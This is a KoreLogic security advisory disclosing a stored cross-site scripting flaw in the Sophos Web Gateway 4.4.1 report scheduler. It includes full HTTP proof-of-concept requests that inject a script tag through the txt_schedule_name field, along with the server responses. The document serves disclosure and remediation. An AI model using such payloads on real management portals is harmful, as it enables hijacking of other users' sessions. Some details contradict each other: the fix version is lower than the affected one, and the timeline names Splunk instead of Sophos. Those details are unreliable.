Advisory ID: KL-001-2018-001
Published: 2018-01-26
Vendor: Sophos

Affected Systems

Product: Web Gateway
Version: 4.4.1
Platform: Embedded Linux

Discovered By: Matt Bergin (KoreLogic)

Vulnerability Details

Affected Vendor: Sophos
Affected Product: Web Gateway
Affected Version: 4.4.1
Platform: Embedded Linux
CWE Classification: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'), CWE-80: Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)
Impact: Arbitrary Code Execution
Attack Vector: HTTP

Vulnerability Description

The report scheduler menu within the management portal contains a persistent (stored) cross-site scripting vulnerability. Because the injected content is stored server-side, it can be used to target other users of the same portal.

Technical Description

A valid session is required to create the report with the persistent cross-site scripting payload attached. An example attack payload is included below. This payload is designed to trigger an alert box displaying the number one.

    POST /index.php?c=report_scheduler HTTP/1.1
    Host: 1.3.3.7
    Accept-Language: en-US,en;q=0.5
    X-Requested-With: XMLHttpRequest
    X-Prototype-Version: 1.6.1
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Content-Length: 1190
    DNT: 1
    Connection: close

    action=save&STYLE=016a16896568739c11955632068abddd&data=%5b%7b%22%53%54%59%4c%45%22%3a%20%22%30%31%36%61%31%36%38%39%36%35%36%38%37%33%39%63%31%31%39%35%35%36%33%32%30%36%38%61%62%64%64%64%22%2c%20%22%63%62%5f%74%72%61%66%5f%70%65%72%66%22%3a%20%22%79%65%73%22%2c%20%22%73%62%5f%64%65%74%61%69%6c%65%64%5f%70%6f%6c%69%63%79%5f%63%6f%75%6e%74%22%3a%20%22%31%22%2c%20%22%73%62%5f%67%72%6f%75%70%73%22%3a%20%22%73%6f%70%68%6f%73%5f%73%77%61%5f%61%6c%6c%5f%64%65%70%61%72%74%6d%65%6e%74%73%22%2c%20%22%72%64%5f%73%63%68%65%64%75%6c%65%22%3a%20%22%64%61%69%6c%79%22%2c%20%22%73%62%5f%64%61%79%73%22%3a%20%22%37%22%2c%20%22%73%62%5f%77%65%65%6b%6c%79%5f%64%61%79%22%3a%20%22%4d%6f%6e%64%61%79%22%2c%20%22%74%78%74%5f%73%63%68%65%64%75%6c%65%5f%6e%61%6d%65%22%3a%20%22%74%65%73%74%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3b%3c%2f%73%63%72%69%70%74%3e%22%2c%20%22%63%62%5f%61%63%74%69%76%61%74%65%5f%73%63%68%65%64%75%6c%65%22%3a%20%22%79%65%73%22%2c%20%22%72%65%63%69%70%69%65%6e%74%73%22%3a%20%22%74%65%73%74%40%74%65%73%74%2e%61%73%64%61%73%64%22%2c%20%22%73%63%68%65%64%75%6c%65%5f%69%64%22%3a%20%22%64%47%56%7a%64%41%3d%3d%22%2c%20%22%6f%77%6e%65%72%22%3a%20%22%61%64%6d%69%6e%22%7d%5d

    HTTP/1.1 200 OK
    Date: Sat, 29 Jul 2017 16:05:25 GMT
    Server: Apache
    Cache-Control: no-store, no-cache, must-revalidate, private, post-check=0, pre-check=0
    Pragma: no-cache
    X-Frame-Options: sameorigin
    X-Content-Type-Options: nosniff
    Connection: close
    Content-Type: text/html; charset=utf-8
    Content-Length: 41

    {"status":0,"statusMsg":"Settings saved"}

The URL-encoded value passed in the data parameter decodes to an array containing a single JSON object.

    [
      {
        "STYLE": "016a16896568739c11955632068abddd",
        "cb_traf_perf": "yes",
        "sb_detailed_policy_count": "1",
        "sb_groups": "sophos_swa_all_departments",
        "rd_schedule": "daily",
        "sb_days": "7",
        "sb_weekly_day": "Monday",
        "txt_schedule_name": "test<script>alert(1);</script>",
        "cb_activate_schedule": "yes",
        "recipients": "test@test.asdasd",
        "schedule_id": "dGVzdA==",
        "owner": "admin"
      }
    ]

Within the JSON buffer is a key called txt_schedule_name. The value for this key is the name of the scheduled report. This value is included in the report schedule list.

    "txt_schedule_name": "test<script>alert(1);</script>"

The HTML tags are stored as-is. When the report schedule list is loaded, the resulting JSON is sent with Content-Type text/html instead of application/json, so the browser renders the body as a document and executes any unescaped JavaScript it contains. The HTML fragment in schedulesList is HTML-encoded, but the txt_schedule_name value in the schedulesJS array is not sanitized, and the payload triggers.

    POST /index.php?c=report_scheduler HTTP/1.1
    Host: 1.3.3.7
    Accept: text/javascript, text/html, application/xml, text/xml, */*
    Accept-Language: en-US,en;q=0.5
    X-Requested-With: XMLHttpRequest
    X-Prototype-Version: 1.6.1
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Content-Length: 81
    DNT: 1
    Connection: close

    action=load&sortKey=name&sortDirection=asc&STYLE=016a16896568739c11955632068abddd

    HTTP/1.1 200 OK
    Date: Sat, 29 Jul 2017 16:06:38 GMT
    Server: Apache
    Cache-Control: no-store, no-cache, must-revalidate, private, post-check=0, pre-check=0
    Pragma: no-cache
    X-Frame-Options: sameorigin
    X-Content-Type-Options: nosniff
    Connection: close
    Content-Type: text/html; charset=utf-8
    Content-Length: 1365

    {"sortKey":"name","sortDirection":"asc","schedulesJS":[{"STYLE":"016a16896568739c11955632068abddd","cb_traf_perf":"yes","sb_detailed_policy_count":"1","sb_groups":"sophos_swa_all_departments","rd_schedule":"daily","sb_days":"7","sb_weekly_day":"Monday","txt_schedule_name":"test<script>alert(1);<\/script>","cb_activate_schedule":"yes","recipients":"test@test.asdasd","schedule_id":"dGVzdA==","owner":"admin"}],"schedulesList":"<ul id=\"table_entries_list\"><li class=\"body schedule-row \" id=\"li_test&lt;script&gt;alert(1);&lt;\/script&gt;\"><div class=\"schedulename\"><a href=\"?STYLE=016a16896568739c11955632068abddd#\" title=\"test&lt;script&gt;alert(1);&lt;\/script&gt;\">test&lt;script&gt;alert(1);&lt;\/script&gt;<\/a><\/div><div class=\"owner\" title=\"admin\">admin<\/div><div class=\"schedule_time\" title=\"Daily\">Daily<\/div><div title=\"Active\" class=\"schedule-active-on\"><\/div><div class=\"action\"><a href=\"?STYLE=016a16896568739c11955632068abddd#\" id=\"on_off_test&lt;script&gt;alert(1);&lt;\/script&gt;\" name=\"on_off_test&lt;script&gt;alert(1);&lt;\/script&gt;\" class=\"button small\"><span class=\"buttonLabel small\" id=\"on_off_span_test&lt;script&gt;alert(1);&lt;\/script&gt;\">Turn Off<\/span><\/a><\/div><div class=\"delete\"><input type=\"checkbox\" id=\"chk_test&lt;script&gt;alert(1);&lt;\/script&gt;\"\/><\/div><\/li><\/ul>"}

Mitigation and Remediation Recommendation

The vendor has released version 4.3.3.1 of the Web Gateway, which addresses this issue. Release notes are available at:

http://wsa.sophos.com/rn/swa/concepts/ReleaseNotes_4.3.3.1.html

Credit

This vulnerability was discovered by Matt Bergin (@thatguylevel) of KoreLogic, Inc.

Proof of Concept

See the Technical Description section above.

The contents of this advisory are copyright(c) 2018 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at: https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt

Disclosure Timeline

KoreLogic submits vulnerability details to Sophos.

Sophos confirms receipt.

30 business days have elapsed since the vulnerability was reported to Sophos.

KoreLogic requests an update from Sophos.

Sophos informs KoreLogic that they will issue a fix in the next maintenance release, scheduled for the end of November. Sophos asks KoreLogic to hold disclosure until the new version is released.

45 business days have elapsed since the vulnerability was reported to Splunk.

Sophos notifies KoreLogic that the maintenance release has gone live.

KoreLogic public disclosure.

Responsible Disclosure

KoreLogic follows responsible disclosure practices. All vulnerabilities are reported to affected vendors with appropriate time for remediation before public disclosure.

Vendor notification and coordination
90+ day disclosure timeline
CVE coordination when applicable